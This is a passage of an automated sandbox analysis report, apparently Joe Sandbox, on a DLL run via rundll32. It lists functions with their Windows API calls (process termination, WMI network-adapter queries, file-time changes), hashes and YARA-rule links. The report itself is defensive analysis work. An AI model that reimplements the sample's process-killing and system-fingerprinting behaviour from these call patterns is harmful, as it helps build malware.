                                      • API ID: ErrorLast$ByteCharD262MultiWidewcslen
                                      • String ID:
                                      • API String ID: 893356176-0
                                      • Opcode ID: afd18ee60ff2b0ce0bcd15a358cca37ac97d015ba3010c487c48ccea99233302
                                      • Instruction ID: 23fc2d8bcf316ea6a60e3ca9b5905811bbe2b2d5fdf9053c8a10922eaeb712a0
                                      • Opcode Fuzzy Hash: afd18ee60ff2b0ce0bcd15a358cca37ac97d015ba3010c487c48ccea99233302
                                      • Instruction Fuzzy Hash: C8F0C862204156BED214E6764C84DEB768CDB856F97124239F564DE441E935DC8181B1
                                      Function 10011320 Relevance: 7.5, APIs: 5, Instructions: 45memorystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlen.KERNEL32(00000000,?,00000000,00000000,1000A74F,?,Win32_NetworkAdapterConfiguration), ref: 10011332
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000001), ref: 10011359
                                      • GetLastError.KERNEL32(?,00000001), ref: 10011369
                                      • GetLastError.KERNEL32(?,00000001), ref: 1001136F
                                      • SysAllocString.OLEAUT32 ref: 10011386
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: ErrorLast$AllocByteCharMultiStringWidelstrlen
                                      • String ID:
                                      • API String ID: 4196186757-0
                                      • Opcode ID: 5bddbd93c25bf412b4bb809baaa78ed8b84148b2e51b7ba0785a3fcadd1d5036
                                      • Instruction ID: 1697f759eb40de09af1bc61be908fb19387247674bfb87126e23a115f11a360f
                                      • Opcode Fuzzy Hash: 5bddbd93c25bf412b4bb809baaa78ed8b84148b2e51b7ba0785a3fcadd1d5036
                                      • Instruction Fuzzy Hash: 5801F472500126F7D710DB60CC05BDE3FA8EF413A1F204130FD54DA0A4E734D6A186E1
                                      Function 10005BF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: strrchr$DirectoryPath
                                      • String ID: 123
                                      • API String ID: 307107200-2286445522
                                      • Opcode ID: 50724f86c3f4088a4114f505fbd4048a7a26bc2a5139918f545a1dec1e3d9f9d
                                      • Instruction ID: 52565608425bb8163d1a49b4138d7fd17ec815c5c5898e6c317b6dd2e097079f
                                      • Opcode Fuzzy Hash: 50724f86c3f4088a4114f505fbd4048a7a26bc2a5139918f545a1dec1e3d9f9d
                                      • Instruction Fuzzy Hash: C63149756043482FF350D234AC46B7B37C8DB81261F400629FD96872C2EE7BE9498252
                                      Function 1000FE10 Relevance: 6.1, APIs: 4, Instructions: 114timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,?,00000000), ref: 1000FE59
                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1000FE86
                                      • GetLocalTime.KERNEL32(?), ref: 1000FEC0
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 1000FED0
                                        • Part of subcall function 1000F7D0: GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1000FE77,?), ref: 1000F7DE
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                      • String ID:
                                      • API String ID: 3986731826-0
                                      • Opcode ID: 61a0087d423c09f97422bc83c9848e8916b95916cdb9e4ba8520c2658471a079
                                      • Instruction ID: 17b5fe91996c6261312ccb9e4e6132c54d30cb61b07fd2e13d415d5cbc7ebe71
                                      • Opcode Fuzzy Hash: 61a0087d423c09f97422bc83c9848e8916b95916cdb9e4ba8520c2658471a079
                                      • Instruction Fuzzy Hash: D04151B1504B459FE320DF29C88096BF7E8FF89354F408A2EF59A83A51D371E909CB61
                                      Function 1000AE80 Relevance: 6.1, APIs: 4, Instructions: 73memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InterlockedDecrement.KERNEL32(00000008), ref: 1000AEA4
                                      • SysFreeString.OLEAUT32(00000000), ref: 1000AEB9
                                      • 6D262DD0.MFC42(0000000C,761DE610,00000000,?,00000000,1001182B,000000FF,1000ADF0,?,00000008,?), ref: 1000AEE0
                                      • SysAllocString.OLEAUT32(?), ref: 1000AF0E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: String$AllocD262DecrementFreeInterlocked
                                      • String ID:
                                      • API String ID: 2797009911-0
                                      • Opcode ID: 2d8dce3105b6f9f3431049397acffbae998695e77875ebfd0e65080e84b591e4
                                      • Instruction ID: 467ef8a558da28dbcad68d4755d69a1ff26c6b184be9d6db0a0de4f2a60c8ced
                                      • Opcode Fuzzy Hash: 2d8dce3105b6f9f3431049397acffbae998695e77875ebfd0e65080e84b591e4
                                      • Instruction Fuzzy Hash: 3521AEB6A006529BE350CF19C845B57B7E8FB48B90F00863DF949D7244E778E884C7A1
                                      Function 100056B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,?,1000575A,?,?,?,00000000), ref: 100056BD
                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,00000000), ref: 100056CC
                                      • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 100056D7
                                      • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 100056E4
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: CloseHandleProcess$OpenTerminate
                                      • String ID:
                                      • API String ID: 6823918-0
                                      • Opcode ID: ba73f2dd624f0828aa206dd07c4a16fe15200f4358f6e993a6f0722e7fc0aad8
                                      • Instruction ID: f7b4e055ffd599d9e0c47c3f774a3c979061384f2bf10b9864beb156a07e91a2
                                      • Opcode Fuzzy Hash: ba73f2dd624f0828aa206dd07c4a16fe15200f4358f6e993a6f0722e7fc0aad8
                                      • Instruction Fuzzy Hash: 37E0C2752022306FF6626774AC4DBAB3694EF0CB52F024200F906D6186C631CC91C6A1
                                      Function 1000A7A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • 6D262DD0.MFC42(0000000C,00000000,00000000,?,00000000,1001178B,000000FF,10009E98,ROOT\CIMV2), ref: 1000A7BC
                                      • SysAllocString.OLEAUT32(?), ref: 1000A7EA
                                      Strings
                                      • Win32_NetworkAdapterConfiguration, xrefs: 1000A7D6
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocD262String
                                      • String ID: Win32_NetworkAdapterConfiguration
                                      • API String ID: 3327814304-4052814535
                                      • Opcode ID: dcc9387750b85e72be689dce455b3cb1c3cd05c30fd87c59f8a4494969a60326
                                      • Instruction ID: 5be8eb74ec117bd519112317e2f5b517d8065636beee4e0cb4edc012c64f21ac
                                      • Opcode Fuzzy Hash: dcc9387750b85e72be689dce455b3cb1c3cd05c30fd87c59f8a4494969a60326
                                      • Instruction Fuzzy Hash: 2501B572500651DBE310CF58C845B56B6E4FB45FA4F20872DF9549B390D7B8D885C7D2
                                      Function 1000A9D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                      • InterlockedDecrement.KERNEL32(00000008), ref: 1000A9DE
                                      • SysFreeString.OLEAUT32(00000000), ref: 1000A9F3
                                      Strings
                                      • Win32_NetworkAdapterConfiguration, xrefs: 1000A9D1
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: DecrementFreeInterlockedString
                                      • String ID: Win32_NetworkAdapterConfiguration
                                      • API String ID: 3298718523-4052814535
                                      • Opcode ID: 21f08bbe9eaea59fddc26aeedd3f048849ab0ef83c9e535bffb6afc4ff47bb10
                                      • Instruction ID: a533a0eff511bb94dcfba7d21632d8268cd47a76a31a49f1588e4cd0f422ce33
                                      • Opcode Fuzzy Hash: 21f08bbe9eaea59fddc26aeedd3f048849ab0ef83c9e535bffb6afc4ff47bb10
                                      • Instruction Fuzzy Hash: 8AF0A0B6B0122257E660DA25A904B4773DCEF02A80B020538FC45E7249E734EC81C691